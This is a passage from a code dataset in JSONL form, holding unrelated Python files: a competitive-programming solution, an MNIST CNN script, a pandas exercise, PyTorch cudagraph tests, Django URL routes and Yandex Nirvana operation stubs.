\")\nname=name.strip()\nsolve(name)","repo_name":"gokuljs/python-rev","sub_path":"solv4.py","file_name":"solv4.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15152139669","text":"# seishin.py\r\nT, N, P = input().split()\r\nT = int(T); N = int(N); P = float(P)\r\nD = []\r\nfor i in range(N):\r\n q, x, t = input().split()\r\n q = float(q); x = int(x); t = int(t)\r\n D.append((t, x, q))\r\nD.sort()\r\n\r\ncur = 1 - P + P*sum(x*q for t, x, q in D)\r\nj = 0\r\nans = 0.\r\nres = 1.\r\nfor y in range(T):\r\n while j < N and D[j][0] <= y:\r\n t, x, q = D[j]\r\n cur += P*q*(1-x)\r\n j += 1\r\n ans += res\r\n res *= cur\r\nprint(\"%.08f\" % ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc015/D/2201646.py","file_name":"2201646.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21837604741","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport pandas as pd\nimport seaborn as sns\n\nfrom keras.datasets import mnist\nfrom keras import layers\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nfrom scipy.ndimage import shift\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\n\nprint(X_train.shape)\n\n\n# Method to shift the image by given dimension\n# def shift_image(image, dx, dy):\n# # image = image.reshape((28, 28))\n# shifted_image = shift(image, [dy, dx], cval=0, mode=\"constant\")\n# return shifted_image\n\n\n# X_train_augmented = [image for image in X_train]\n# y_train_augmented = [image for image in y_train]\n\n# print(\"creating augmented data source\")\n# for dx, dy in ((1, 0), (-1, 0), (0, 1), (0, -1)):\n# for image, label in zip(X_train, y_train):\n# X_train_augmented.append(shift_image(image, dx, dy))\n# y_train_augmented.append(label)\n\n\n# # Shuffle the dataset\n# shuffle_idx = np.random.permutation(len(X_train_augmented))\n# X_train = np.array(X_train_augmented)[shuffle_idx]\n# y_train = np.array(y_train_augmented)[shuffle_idx]\n\n# Check how many examples do we have in our train and test sets\nprint(\n f\"We have {len(X_train)} images in the training set and {len(X_test)} images in the test set.\"\n)\n\n# See the shape of the first sample of our training set\nprint(X_train[0].shape)\n\n# Plot the first image in our dataset\nplt.imshow(X_train[0])\nplt.show()\n\n# Plot in grayscale with no axes\nplt.figure(figsize=(3, 3))\nplt.imshow(X_train[0], cmap=\"gray\")\nplt.title(y_train[0])\nplt.axis(False)\nplt.show()\n\n# Plot a random image\nrandom_image = random.randint(0, len(X_train))\n\nplt.figure(figsize=(3, 3))\nplt.imshow(X_train[random_image], cmap=\"gray\")\n\nplt.title(y_train[random_image])\nplt.axis(False)\nplt.show()\n\n# The Conv2D layer in a convolutional model requires the input to be in shape: [height, width, color_channels] but we only have the height and width dimensions so far.\n# Let's reshape our train and test data to have the missing color_channels dimension as well.\nX_train = X_train.reshape(X_train.shape + (1,))\nX_test = X_test.reshape(X_test.shape + (1,))\n\nprint(X_train.shape) # (60000, 28, 28, 1)\n\n# Normalize our train and test images\nX_train = X_train / 255.0\nX_test = X_test / 255.0\n\n# Change the datatype of our training and test sets to float32\nX_train = X_train.astype(np.float32)\nX_test = X_test.astype(np.float32)\n\n# We’ll follow the TinyVGG architecture\n\nmodel = tf.keras.Sequential(\n [\n layers.Conv2D(\n filters=10, kernel_size=3, activation=\"relu\", input_shape=(28, 28, 1)\n ), # Applies 10 filters to the images\n layers.Conv2D(10, 3, activation=\"relu\"),\n layers.MaxPool2D(), # Downsizes the images\n layers.Conv2D(10, 3, activation=\"relu\"),\n layers.Conv2D(10, 3, activation=\"relu\"),\n layers.MaxPool2D(),\n layers.Flatten(), # Make the output one-dimensional\n layers.Dense(10, activation=\"softmax\"),\n ]\n)\n\n# Check summary of model\nprint(model.summary())\n\n# Compile model\nmodel.compile(\n loss=\"sparse_categorical_crossentropy\",\n optimizer=tf.keras.optimizers.Adam(),\n metrics=[\"accuracy\"],\n)\n\n# Train model or load saved model\n# model.fit(X_train, y_train, epochs=10)\nmodel.load_weights(\"./model_base\")\n\n# Check against test set\nmodel.evaluate(X_test, y_test)\n\n# Save model\n# model.save(\"model.bin\")\n\n# Predict the value of the digit on the test subset\npredicted = model.predict(X_test)\n\nprint(y_test.shape)\nprint(y_test)\n# Convert predicted weights into index of highest weight\npredicted = np.argmax(predicted, axis=1)\nprint(predicted.shape)\nprint(predicted)\n\n# Print classification report\nprint(\n f\"Classification report for classifier {model}:\\n\"\n f\"{metrics.classification_report(y_test, predicted)}\\n\"\n)\n\n# 4 test samples and show their predicted digit value in the title.\n_, axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\nfor ax, image, prediction in zip(axes, X_test, predicted):\n ax.set_axis_off()\n ax.imshow(image, cmap=\"gray\", interpolation=\"nearest\")\n ax.set_title(f\"Prediction: {prediction}\")\n\n# accuracy\nacc = accuracy_score(y_test, predicted)\nprint(\"Gradient Boosting Classifier accuracy is : {:.3f}\".format(acc))\n\ndisp = metrics.ConfusionMatrixDisplay.from_predictions(y_test, predicted)\ndisp.figure_.suptitle(\"Confusion Matrix\")\nprint(f\"Confusion matrix:\\n{disp.confusion_matrix}\")\n\nplt.show()\n","repo_name":"delabroj/python-templates","sub_path":"handwritten-digits-tensorflow/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35099407135","text":"#!/usr/bin/python3\n\"\"\"\n-- Core pandas\n---- Series methods\n------ Coding challenge\n\"\"\"\nimport datetime as dt\nimport pandas as pd\n\nday = dt.datetime(2020, 12, 26)\nprint(day.strftime(\"%A\")) # Saturday\n\nbattles_dataframe = pd.read_csv(\"../datasets/revolutionary_war.csv\").head()\nprint(battles_dataframe)\n# Battle Start Date State\n# 0 Powder Alarm 9/1/1774 Massachusetts\n# 1 Storming of Fort William and Mary 12/14/1774 New Hampshire\n# 2 Battles of Lexington and Concord 4/19/1775 Massachusetts\n# 3 Siege of Boston 4/19/1775 Massachusetts\n# 4 Gunpowder Incident 4/20/1775 Virginia\n\n\ndays_of_war_series = pd.read_csv(\n filepath_or_buffer=\"../datasets/revolutionary_war.csv\",\n parse_dates=[\"Start Date\"],\n usecols=[\"Start Date\"]\n).squeeze(\"columns\")\n\nprint(days_of_war_series.head())\n# 0 1774-09-01\n# 1 1774-12-14\n# 2 1775-04-19\n# 3 1775-04-19\n# 4 1775-04-20\n# Name: Start Date, dtype: datetime64[ns]\n\n\ndef get_day_of_week(date):\n return date.strftime(\"%A\")\n\n\n# print(days_of_war_series.apply(get_day_of_week))\n# # ValueError: NaTType does not support strftime\n\nprint(days_of_war_series.dropna().apply(get_day_of_week))\n# 0 Thursday\n# 1 Wednesday\n# 2 Wednesday\n# 3 Wednesday\n# 4 Thursday\n# ...\n# 227 Wednesday\n# 228 Friday\n# 229 Friday\n# 230 Friday\n# 231 Wednesday\n# Name: Start Date, Length: 228, dtype: object\n\nprint(days_of_war_series.dropna().apply(get_day_of_week).value_counts())\n# Saturday 39\n# Friday 39\n# Wednesday 32\n# Thursday 31\n# Sunday 31\n# Tuesday 29\n# Monday 27\n# Name: Start Date, dtype: int64\n\n\n\n\n\n\n\n\n","repo_name":"ax-va/Pandas-Paskhaver-2021","sub_path":"examples/example-03-6-series--coding-challenge.py","file_name":"example-03-6-series--coding-challenge.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14821503879","text":"# Owner(s): [\"module: cuda graphs\"]\n\nimport functools\nimport unittest\n\nimport torch\n\nimport torch._dynamo\nimport torch._dynamo.config\nimport torch._dynamo.test_case\nimport torch._dynamo.testing\nfrom torch._dynamo.testing import same\nfrom torch.testing._internal.common_utils import skipIfRocm, TEST_CUDA_GRAPH\n\n\ndef composed(*decs):\n def deco(f):\n for dec in reversed(decs):\n f = dec(f)\n return f\n\n return deco\n\n\ndef assert_aot_autograd_counter(ok=True):\n def deco(f):\n @functools.wraps(f)\n def wrap(self, *args, **kwargs):\n torch._dynamo.utils.counters.clear()\n r = f(self, *args, **kwargs)\n c_ok = torch._dynamo.utils.counters[\"aot_autograd\"][\"ok\"]\n c_not_ok = torch._dynamo.utils.counters[\"aot_autograd\"][\"not_ok\"]\n if ok:\n self.assertGreater(c_ok, 0)\n self.assertEqual(c_not_ok, 0)\n else:\n self.assertEqual(c_ok, 0)\n self.assertGreater(c_not_ok, 0)\n return r\n\n return wrap\n\n return deco\n\n\ndef patch_all(ok=True):\n return composed(\n torch._dynamo.config.patch(\n verify_correctness=True, automatic_dynamic_shapes=True\n ),\n assert_aot_autograd_counter(ok),\n )\n\n\nN_ITERS = 5\n\n\n@unittest.skipIf(not torch.cuda.is_available(), \"these tests require cuda\")\nclass TestAotCudagraphs(torch._dynamo.test_case.TestCase):\n @patch_all()\n def test_basic(self):\n def model(x, y):\n return (x + y) * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_dtoh(self):\n def model(x, y):\n a = x + y\n b = a.cpu() * 3\n return b\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_htod(self):\n def model(x, y):\n a = x + y\n return a * 3\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n loss = model(x, y).sum()\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn((), device=\"cpu\")\n fn(x, y)\n\n @skipIfRocm\n def test_mutate_input(self):\n def model(x, y):\n y.add_(3)\n return x * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n with self.subTest(i):\n y_orig = y.clone()\n loss = model(x, y).sum()\n self.assertTrue(same(y, y_orig + 3))\n loss.backward()\n\n x = torch.randn(3, device=\"cuda\", requires_grad=True)\n y = torch.randn(3, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_mutate_constant(self):\n def model(x, y):\n c = torch.tensor(1)\n c.add_(2)\n return x * y * 0 + c\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x, y):\n for i in range(N_ITERS):\n with self.subTest(i):\n loss = model(x, y).sum()\n self.assertTrue(same(loss, torch.tensor(3.0, device=\"cuda\")))\n loss.backward()\n\n x = torch.randn(1, device=\"cuda\", requires_grad=True)\n y = torch.randn(1, device=\"cuda\")\n fn(x, y)\n\n @patch_all()\n def test_factory(self):\n def model(y):\n x = torch.zeros(3, device=\"cuda:0\")\n x.add_(3)\n return x * y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(y):\n for i in range(N_ITERS):\n with self.subTest(i):\n loss = model(y).sum()\n loss.backward()\n\n y = torch.randn(3, device=\"cuda:0\", requires_grad=True)\n fn(y)\n\n @patch_all()\n def test_mutated_metadata(self):\n # more tortured example at\n # https://github.com/pytorch/pytorch/issues/81385\n def model(x):\n x = x.clone()\n x.resize_(20)\n x.fill_(2)\n return x\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x):\n for i in range(N_ITERS):\n with self.subTest(i):\n rx = model(x)\n self.assertTrue(same(rx, torch.full((20,), 2.0, device=\"cuda:0\")))\n\n x = torch.empty(0, device=\"cuda:0\")\n fn(x)\n\n @patch_all()\n def test_dead_fill(self):\n def model(x):\n x = x.clone()\n y = x[0:0]\n x.fill_(2)\n y.fill_(3)\n return x, y\n\n @torch._dynamo.optimize(\"cudagraphs\")\n def fn(x):\n for i in range(N_ITERS):\n with self.subTest(i):\n rx, ry = model(x)\n self.assertTrue(same(rx, torch.full((20,), 2.0, device=\"cuda:0\")))\n self.assertTrue(same(ry, torch.empty(0, device=\"cuda:0\")))\n\n x = torch.empty(20, device=\"cuda:0\")\n fn(x)\n\n\nif __name__ == \"__main__\":\n from torch._dynamo.test_case import run_tests\n\n if not TEST_CUDA_GRAPH:\n if __name__ == \"__main__\":\n import sys\n\n sys.exit(0)\n raise unittest.SkipTest(\"cuda graph test is skipped\")\n\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/dynamo/test_cudagraphs.py","file_name":"test_cudagraphs.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"570241647","text":"def f_1(x):\n c=0\n f=[2,1]\n while f[-1]<=x:\n f.append(f[-1]+f[-2])\n c+=1\n return f\n\nf=f_1(1E9)\nn=int(input())\nfor i in range(n):\n v=int(input())\n if v in f:\n print(f)\n else:\n print(\"0\")","repo_name":"andresculchac/MisionTic2022.py","sub_path":"FundamentalsUNacional/Modulo 8/SerieDeLucas.py","file_name":"SerieDeLucas.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9241166129","text":"from django.urls import path\nfrom . import views as store_views\n\nurlpatterns = [\n path('', store_views.home, name='home'),\n path('cart', store_views.cart, name='cart'),\n path('product/', store_views.product, name='product'),\n path('category//products', store_views.products, name='products-by-category'),\n path('cart/add/', store_views.add_cart, name='add-cart'),\n path('cart/remove/', store_views.remove_cart, name='remove-cart'),\n path('checkout', store_views.checkout, name='checkout'),\n path('success', store_views.successful_payment, name='success'),\n]\n\n# Author.objects.filter(name__contains='Terry')","repo_name":"vivekascoder/Marche","sub_path":"store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"157657339","text":"import typing\nimport vh3\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/6ef6b6f1-30c4-4115-b98c-1ca323b50ac0\")\n@vh3.decorator.nirvana_names(yt_token=\"yt-token\", base_path=\"base_path\")\n@vh3.decorator.nirvana_output_names(\"outTable\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_camel)\ndef get_mr_table(\n *,\n cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"banach\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n \"zeno\",\n ]\n ] = None,\n creation_mode: vh3.Enum[typing.Literal[\"NO_CHECK\",\n \"CHECK_EXISTS\"]] = \"NO_CHECK\",\n table: vh3.String = None,\n yt_token: vh3.Secret = None,\n file_with_table_name: vh3.Text = None,\n base_path: typing.Union[vh3.MRDirectory, vh3.MRFile, vh3.MRTable] = None\n) -> vh3.MRTable:\n \"\"\"\n Get MR Table\n\n Creates a reference to MR Table, either existing or potential.\n * If input `fileWithTableName` is present, its first line will be used as the table's path. If not, `table` option value will be used instead.\n * If `base_path` input is present, table path will be treated as *relative* and resolved against `base_path`. If not, path will be treated as *absolute*.\n\n :param cluster: Cluster:\n [[MR Cluster this table is on]]\n MR Cluster name, recognized by MR processor and FML processor.\n * If not set, `base_path`'s cluster will be used\n * If both `cluster` option value and `base_path` input are present, cluster name specified in **option** will be used\n :param creation_mode: Creation Mode:\n [[Actions to take when getting the MR Table]]\n MR Path creation mode. Specifies additional actions to be taken when getting the path\n :param table: Table:\n [[Path to MR Table]]\n Path to MR table. Used when `fileWithTableName` input is absent.\n * If `base_path` input is absent, this is an absolute path.\n * If `base_path` input is present, this is a relative path.\n :param yt_token: YT Token:\n [[(Optional) Token used if Creation Mode is \"Check that Path Exists\".\n Write the name of Nirvana Secret holding your YT Access Token here.]]\n *(Optional)* YT OAuth Token to use in \"Check that Path Exists\" Creation Mode. If not specified, MR Processor's token will be used.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param file_with_table_name:\n Text file with MR table path on its first line. If this input is absent, `table` option value will be used instead.\n * If `base_path` input is absent, this is an absolute path.\n * If `base_path` input is present, this is a relative path.\n :param base_path:\n Base path to resolve against.\n\n If absent, table path is considered absolute.\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/84de6480-2091-47e4-b6f7-3aa5bfbae472\")\n@vh3.decorator.nirvana_names(bundle_tar_gz=\"bundle.tar.gz\")\n@vh3.decorator.nirvana_output_names(\"dst\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef antifraud_runner(\n *,\n yt_token: vh3.Secret,\n mr_account: vh3.String,\n bundle_tar_gz: vh3.Binary,\n src: vh3.MRTable,\n job_layer: vh3.MultipleStrings = (\n \"01d15282-fecf-4c29-8771-1daeb410eeee\", \"c0996254-74bf-4d43-a0f6-d1e453f70c19\"),\n max_ram: vh3.Integer = 512,\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"arnold\"\n) -> vh3.MRTable:\n \"\"\"\n antifraud runner\n\n :param bundle_tar_gz:\n :param job_layer:\n :param mr_account: MR Account:\n [[MR Account Name.\n By default, output tables and directories will be created in some subdirectory of home///nirvana]]\n MR account name (e.g. `rank_machine`) used to build MR output path for this operation.\n\n See the `mr-output-path` option for more information\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\nclass Yql1Output(typing.NamedTuple):\n output1: vh3.OptionalOutput[vh3.MRTable]\n directory: vh3.OptionalOutput[vh3.MRDirectory]\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/6356092e-a511-49d2-9dc5-7ea81adcde9c\")\n@vh3.decorator.nirvana_names(\n py_code=\"py_code\",\n py_export=\"py_export\",\n py_version=\"py_version\",\n use_account_tmp=\"use_account_tmp\",\n code_revision=\"code_revision\",\n code_work_dir=\"code_work_dir\",\n arcanum_token=\"arcanum_token\",\n svn_user_name=\"svn_user_name\",\n svn_user_id_rsa=\"svn_user_id_rsa\",\n svn_operation_source=\"svn_operation_source\",\n yql_server=\"yql_server\",\n)\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef yql_1(\n *,\n mr_account: vh3.String,\n yt_token: vh3.Secret,\n yql_token: vh3.Secret,\n request: vh3.String = \"INSERT INTO {{output1}} SELECT * FROM {{input1}};\",\n py_code: vh3.String = None,\n py_export: vh3.MultipleStrings = (),\n py_version: vh3.Enum[typing.Literal[\"Python2\",\n \"ArcPython2\", \"Python3\"]] = \"Python3\",\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"hahn\",\n yt_pool: vh3.String = None,\n ttl: vh3.Integer = 7200,\n max_ram: vh3.Integer = 256,\n max_disk: vh3.Integer = 1024,\n timestamp: vh3.String = None,\n param: vh3.MultipleStrings = (),\n mr_output_path: vh3.String = None,\n yt_owners: vh3.String = None,\n use_account_tmp: vh3.Boolean = False,\n code_revision: vh3.String = None,\n code_work_dir: vh3.String = None,\n arcanum_token: vh3.Secret = None,\n svn_user_name: vh3.String = None,\n svn_user_id_rsa: vh3.Secret = None,\n svn_operation_source: vh3.MultipleStrings = (),\n yql_operation_title: vh3.String = \"YQL Nirvana Operation: {{nirvana_operation_url}}\",\n yql_server: vh3.String = \"yql.yandex.net\",\n mr_output_ttl: vh3.Integer = None,\n retries_on_job_failure: vh3.Integer = 0,\n retries_on_system_failure: vh3.Integer = 10,\n job_metric_tag: vh3.String = None,\n mr_transaction_policy: vh3.Enum[typing.Literal[\"MANUAL\", \"AUTO\"]] = \"AUTO\",\n input1: typing.Sequence[vh3.MRTable] = (),\n files: typing.Sequence[\n typing.Union[\n vh3.Binary,\n vh3.Executable,\n vh3.HTML,\n vh3.Image,\n vh3.JSON,\n vh3.MRDirectory,\n vh3.MRTable,\n vh3.TSV,\n vh3.Text,\n vh3.XML,\n ]\n ] = ()\n) -> Yql1Output:\n \"\"\"\n YQL 1\n\n Apply YQL script on MapReduce\n\n Code: https://a.yandex-team.ru/arc/trunk/arcadia/dj/nirvana/operations/yql/yql\n\n User guide: https://wiki.yandex-team.ru/nirvana-ml/ml-marines/#yql\n\n :param mr_account: MR Account:\n [[MR Account Name.\n By default, output tables and directories will be created in some subdirectory of home///nirvana]]\n MR account name (e.g. `rank_machine`) used to build MR output path for this operation.\n\n See the `mr-output-path` option for more information\n :param yt_token: YT Token:\n [[ID of Nirvana Secret with YT access token (https://nda.ya.ru/3RSzVU).\n Guide to Nirvana Secrets: https://nda.ya.ru/3RSzWZ]]\n YT OAuth Token.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param yql_token: YQL Token:\n [[YQL OAuth Token, see https://wiki.yandex-team.ru/kikimr/yql/userguide/cli/#autentifikacija]]\n YQL OAuth Token, see https://wiki.yandex-team.ru/kikimr/yql/userguide/cli/#autentifikacija\n :param request: Request\n [[YQL request]]\n YQL request\n :param py_code: Python Code\n [[Python user defined functions definition]]\n Python user defined functions definition\n :param py_export: Python Export\n [[Python user defined functions declaration]]\n Python user defined functions declaration\n :param py_version: Python Version\n [[Python user defined functions version, https://clubs.at.yandex-team.ru/yql/2400]]\n Python user defined functions version, https://clubs.at.yandex-team.ru/yql/2400\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n Default YT cluster\n :param yt_pool: YT Pool:\n [[Pool used by YT scheduler. Leave blank to use default pool.\n This option has no effect on YaMR.]]\n Pool used by [YT operation scheduler](https://nda.ya.ru/3Rk4af). Leave this blank to use default pool.\n :param timestamp: Timestamp for caching\n [[Any string used for Nirvana caching only]]\n Any string used for Nirvana caching only\n :param param: Parameters\n [[List of 'name=value' items which could be accessed as {{param[name]}}]]\n List of 'name=value' items which could be accessed as {{param[name]}}\n :param mr_output_path: MR Output Path:\n [[Directory for output MR tables and directories.\n Limited templating is supported: `${param[\"...\"]}`, `${meta[\"...\"]}`, `${mr_input[\"...\"]}` (path to input MR *directory*) and `${uniq}` (= unique path-friendly string).]]\n Directory for output MR tables and directories.\n\n Limited templating is supported: `${param[\"...\"]}`, `${meta[\"...\"]}`, `${mr_input[\"...\"]}` (path to input MR *directory*) and `${uniq}` (= unique path-friendly string).\n\n The default template for `mr-output-path` is\n\n home[#if param[\"mr-account\"] != meta.owner]/${param[\"mr-account\"]}[/#if]/${meta.owner}/nirvana/${meta.operation_uid}\n\n If output path does not exist, it will be created.\n\n Temporary directory, `${mr_tmp}`, is derived from output path in an unspecified way. It is ensured that:\n * It will exist before `job-command` is started\n * It need not be removed manually after execution ends. However, you **should** remove all temporary data created in `${mr_tmp}`, even if your command fails\n :param yt_owners: YT Owners\n [[Additional YT users allowed to read and manage operations]]\n Additional YT users allowed to read and manage operations\n :param use_account_tmp: Use tmp in account\n [[Use tmp folder in account but not in //tmp for avoid fails due to tmp overquota, recommended for production processes]]\n Use tmp folder in account but not in //tmp for avoid fails due to tmp overquota, recommended for production processes\n :param code_revision: Code default revision\n [[Default code revision for {{arcadia:/...}}]]\n Default code revision for {{arcadia:/...}}\n :param code_work_dir: Code default directory\n [[Default code working directory for {{./...}}]]\n Default code working directory for {{./...}}\n :param arcanum_token: Arcanum Token\n [[Arcanum Token, see https://wiki.yandex-team.ru/arcanum/api/]]\n Arcanum Token, see https://wiki.yandex-team.ru/arcanum/api/\n :param svn_user_name: SVN User name\n [[SVN user name for operation source and {{arcadia:/...}}]]\n SVN user name for operation source and {{arcadia:/...}}\n :param svn_user_id_rsa: SVN User private key\n [[SVN user private key for operation source and {{arcadia:/...}}]]\n SVN user private key for operation source and {{arcadia:/...}}\n :param svn_operation_source: SVN Operation source\n [[The YQL operation source path on SVN, should start with arcadia:/ or svn+ssh://, may contain @revision]]\n The YQL operation source path on SVN, should start with arcadia:/ or svn+ssh://, may contain @revision\n :param yql_operation_title: YQL Operation title\n [[YQL operation title for monitoring]]\n YQL operation title for monitoring\n :param yql_server: YQL server\n [[YQL server]]\n YQL server (default: yql.yandex.net)\n :param mr_output_ttl: MR Output TTL, days:\n [[TTL in days for mr-output-path directory and outputs which are inside the directory]]\n TTL in days for mr-output-path directory and outputs which are inside the directory\n :param job_metric_tag: Job metric tag\n [[Tag for monitoring of resource usage]]\n Tag for monitoring of resource usage\n :param mr_transaction_policy: MR Transaction policy\n [[Transaction policy, in auto policy yql operations are canceled when nirvana workflow in canceled]]\n Transaction policy, in auto policy yql operations are canceled when nirvana workflow in canceled\n :param input1:\n Input 1\n :param files:\n Attached files: if link_name is specified it is interpreted as file name, otherwise the input is unpacked as tar archive\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/7b6e03f0-c942-4911-b276-bc81d705c59b\")\n@vh3.decorator.nirvana_names(timestamp=\"Timestamp\", sync=\"Sync\")\n@vh3.decorator.nirvana_output_names(\"YA_PACKAGE\")\ndef ya_package(\n *,\n packages: vh3.String = None,\n package_type: vh3.Enum[typing.Literal[\"tarball\", \"debian\"]] = \"tarball\",\n use_new_format: vh3.Boolean = False,\n strip_binaries: vh3.Boolean = False,\n resource_type: vh3.String = \"YA_PACKAGE\",\n arcadia_patch: vh3.String = None,\n use_aapi_fuse: vh3.Boolean = True,\n use_arc_instead_of_aapi: vh3.Boolean = False,\n aapi_fallback: vh3.Boolean = False,\n run_tests: vh3.Boolean = False,\n checkout: vh3.Boolean = False,\n use_ya_dev: vh3.Boolean = False,\n sandbox_oauth_token: vh3.Secret = None,\n arcadia_url: vh3.String = \"arcadia:/arc/trunk/arcadia\",\n arcadia_revision: vh3.Integer = None,\n checkout_arcadia_from_url: vh3.String = None,\n kill_timeout: vh3.Integer = None,\n sandbox_requirements_disk: vh3.Integer = None,\n sandbox_requirements_ram: vh3.Integer = None,\n cache: vh3.String = None,\n build_type: vh3.Enum[\n typing.Literal[\"release\", \"debug\", \"profile\", \"coverage\",\n \"relwithdebinfo\", \"valgrind\", \"valgrind-release\"]\n ] = \"release\",\n host_platform: vh3.String = None,\n target_platform: vh3.String = None,\n clear_build: vh3.Boolean = False,\n sanitize: vh3.Enum[typing.Literal[\"undefined\",\n \"address\", \"memory\", \"thread\"]] = None,\n compress_package_archive: vh3.Boolean = True,\n owner: vh3.String = None,\n timestamp: vh3.Date = None,\n build_system: vh3.Enum[typing.Literal[\"ya\",\n \"ya_force\", \"semi_distbuild\", \"distbuild\"]] = \"ya\",\n ya_yt_token_vault_owner: vh3.String = None,\n ya_yt_token_vault_name: vh3.String = None,\n sync: typing.Union[\n vh3.Binary,\n vh3.Executable,\n vh3.FMLDumpParse,\n vh3.FMLFormula,\n vh3.FMLFormulaSerpPrefs,\n vh3.FMLPool,\n vh3.FMLPrs,\n vh3.FMLSerpComparison,\n vh3.FMLWizards,\n vh3.File,\n vh3.HTML,\n vh3.HiveTable,\n vh3.Image,\n vh3.JSON,\n vh3.MRDirectory,\n vh3.MRFile,\n vh3.MRTable,\n vh3.TSV,\n vh3.Text,\n vh3.XML,\n ] = None\n) -> vh3.Binary:\n \"\"\"\n YA_PACKAGE\n\n **Назначение операции**\n\n Создает архив из файлов Arcadia c помощью Sandbox-задачи YA_PACKAGE.\n\n **Описание входов**\n\n - \"sync\" - любые данные, используются для синхронизации выполнения с другими операциями.\n\n **Описание выходов**\n\n - \"YA_PACKAGE\" - архив (бинарный файл).\n\n\n **Ограничения**\n\n Не предусмотрены.\n\n :param timestamp:\n :param sync:\n :param packages: Package paths relative to arcadia, `;` separated\n :param package_type: Package type: debian or tarball\n :param use_new_format: New ya package json format\n [[ya package --new]]\n :param strip_binaries: Strip debug information\n :param resource_type: Created resource type\n :param arcadia_patch: Apply patch (diff file rbtorrent, paste.y-t.ru link or plain text).\n :param use_aapi_fuse: Use arcadia-api fuse\n :param use_arc_instead_of_aapi: Use arc fuse instead of aapi\n :param aapi_fallback: Fallback to svn/hg if AAPI services are temporary unavailable\n :param run_tests: Run tests after build\n :param checkout: Run ya make with --checkout\n :param use_ya_dev: Use ya-dev to build\n :param sandbox_oauth_token: OAuth token secret\n :param arcadia_url: Arcadia base URL\n :param arcadia_revision: Arcadia revision\n :param checkout_arcadia_from_url: Full SVN url for arcadia (Overwrites base URL and revision, use @revision to fix revision)\n :param kill_timeout: Kill Timeout (seconds)\n :param sandbox_requirements_disk: Disk requirements in Mb\n :param sandbox_requirements_ram: RAM requirements in Mb\n :param 